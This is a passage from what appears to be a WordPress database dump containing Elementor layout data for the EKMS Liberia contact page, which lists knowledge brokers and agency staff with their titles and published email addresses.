column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21855,3167,'_wp_attached_file','2020/10/IMG_20200908_105852_513.jpg'),(21856,3167,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:35:\"2020/10/IMG_20200908_105852_513.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_20200908_105852_513-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_20200908_105852_513-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21857,3168,'_elementor_edit_mode','builder'),(21858,3168,'_elementor_template_type','wp-page'),(21859,3168,'_elementor_version','2.8.1'),(21860,3168,'_wp_page_template','default'),(21861,3168,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_l